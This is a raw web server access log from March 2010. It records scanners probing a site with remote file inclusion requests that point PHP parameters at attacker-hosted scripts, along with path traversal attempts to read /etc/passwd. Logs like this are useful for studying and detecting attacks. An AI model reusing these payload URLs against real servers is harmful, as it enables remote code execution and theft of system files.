85.101.22.238 - - [03/Mar/2010:13:21:47 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.0761866623004096 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:47 -0800] "GET /musim/subbar/meonline.php?nocache=0.18209761814425118 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.22.238 - - [03/Mar/2010:13:21:49 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.27832730726861665 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:21:50 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:22:26 -0800] "GET /logs//index.php?seite=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:22:55 -0800] "GET /logs/access_100222.log%20%20//write_update.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:22:55 -0800] "GET /write_update.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:22:55 -0800] "GET /logs//write_update.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:13:22:55 -0800] "GET /logs/access_100205.log HTTP/1.1" 200 1392786 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:23:01 -0800] "GET /logs/access_100226.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:23:20 -0800] "GET /logs/access_100214.log%20%20//write_update.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:39 -0800] "GET /logs/access_100126.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:39 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:40 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:40 -0800] "GET /logs/access_100126.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:41 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:23:41 -0800] "GET /logs/access_100126.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:23:52 -0800] "GET /logs/access_100213.log//index.php?seite=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:23:52 -0800] "GET /logs//index.php?seite=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:23:53 -0800] "GET /index.php?seite=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:27:52 -0800] "GET /logs/access_100206.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:27:52 -0800] "GET /logs/access_100206.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:13:27:52 -0800] "GET /logs/access_100206.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:30:23 -0800] "GET /logs/access_100222.log//write_update.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:30:29 -0800] "GET /logs/access_100214.log//write_update.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:31:08 -0800] "GET /logs/access_100213.log//index.php?seite=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:31:09 -0800] "GET /logs//index.php?seite=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:31:09 -0800] "GET /index.php?seite=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:25 -0800] "GET /logs/access_100225.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:25 -0800] "GET /logs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:25 -0800] "GET /delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:53 -0800] "GET /logs/access_100225.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:53 -0800] "GET /delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:33:58 -0800] "GET /logs/access_100218.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:34:00 -0800] "GET /logs/access_100213.log%20%20//index.php?seite=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:13:34:18 -0800] "GET /logs/access_100218.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:13:35:03 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:13:35:03 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:13:35:04 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:35:21 -0800] "GET /logs/access_100213.log%20%20//index.php?seite=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:13:35:33 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:35:41 -0800] "GET /ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:35:42 -0800] "GET /logs/access_100222.log%20%20//ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:35:42 -0800] "GET /logs//ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:36:18 -0800] "GET /logs/access_100214.log%20%20//ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.179.200.45 - - [03/Mar/2010:13:38:53 -0800] "GET /pnetsite/fav.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; U; PPC; en-US; rv:9.1) Clecko/20100217 Classilla/CFM" "www.pixero.net"
77.241.83.107 - - [03/Mar/2010:13:39:15 -0800] "GET /logs/access_100226.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:39:25 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:39:25 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:39:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:41:23 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.smrkbor.cz/cz/katalog/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:41:24 -0800] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://www.smrkbor.cz/cz/katalog/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:41:24 -0800] "GET /logs/access_100215.log//includes/functions_admin.php?phpbb_root_path=http://www.smrkbor.cz/cz/katalog/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:41:29 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:41:29 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:41:29 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:13:41:50 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:13:41:54 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:43:00 -0800] "GET /logs/access_100128.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:13:43:03 -0800] "GET /logs/access_100128.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:43:08 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:43:09 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:46:02 -0800] "GET /logs/access_100222.log//ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:46:07 -0800] "GET /logs/access_100125.log//ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:46:22 -0800] "GET /logs/access_100213.log%20%20//index.php?seite=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:13:46:36 -0800] "GET /logs/access_100226.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:47:13 -0800] "GET /logs/access_100218.log//index.php?seite=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:48:12 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:48:12 -0800] "GET /logs/access_100213.log//index.php?DOCUMENT_ROOT=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:48:13 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [03/Mar/2010:13:48:24 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [03/Mar/2010:13:48:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [03/Mar/2010:13:48:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:13:48:33 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
118.168.13.47 - - [03/Mar/2010:13:49:50 -0800] "GET /logs/access_100128.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:13:50:01 -0800] "GET /logs/access_100214.log//ver2/bbs/bbs//write_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [03/Mar/2010:13:51:41 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [03/Mar/2010:13:51:41 -0800] "GET /logs//main.php?sayfa=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [03/Mar/2010:13:51:41 -0800] "GET /main.php?sayfa=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:52:37 -0800] "GET /logs/access_100213.log//index.php?DOCUMENT_ROOT=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:52:37 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:52:38 -0800] "GET /index.php?DOCUMENT_ROOT=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:13:54:19 -0800] "GET /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.228.16.228 - - [03/Mar/2010:13:54:49 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [03/Mar/2010:13:54:49 -0800] "GET /logs/access_100130.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [03/Mar/2010:13:54:49 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [03/Mar/2010:13:54:49 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [03/Mar/2010:13:54:49 -0800] "GET /logs/access_100130.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [03/Mar/2010:13:54:50 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:13:55:16 -0800] "GET /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:13:55:24 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:55:37 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:55:37 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:55:37 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:13:55:42 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:58:04 -0800] "GET /delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:58:04 -0800] "GET /logs/access_100225.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:58:04 -0800] "GET /logs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:58:20 -0800] "GET /delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:58:20 -0800] "GET /logs/access_100225.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:13:58:23 -0800] "GET /logs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:58:32 -0800] "GET /logs/access_100213.log//index.php?DOCUMENT_ROOT=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:58:32 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.247.197 - - [03/Mar/2010:13:58:33 -0800] "GET /index.php?DOCUMENT_ROOT=http://mapotuntun.co.kr/data/log/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:13:59:03 -0800] "GET /logs/access_100213.log%20%20//index.php?DOCUMENT_ROOT=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:00:39 -0800] "GET /logs/access_100209.log%20%20/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:00:39 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:00:39 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:00:45 -0800] "GET /logs/access_100209.log%20%20/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:00:45 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:00:45 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.110.224.127 - - [03/Mar/2010:14:00:59 -0800] "GET /logs///includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:01:05 -0800] "GET /logs/access_100226.log%20%20/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.143.143 - - [03/Mar/2010:14:01:06 -0800] "GET /logs/access_100218.log//index.php?DOCUMENT_ROOT=http://www.voiptechnocrats.com/command/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:14:01:08 -0800] "GET /logs/access_100226.log%20%20/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:14:01:51 -0800] "GET /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
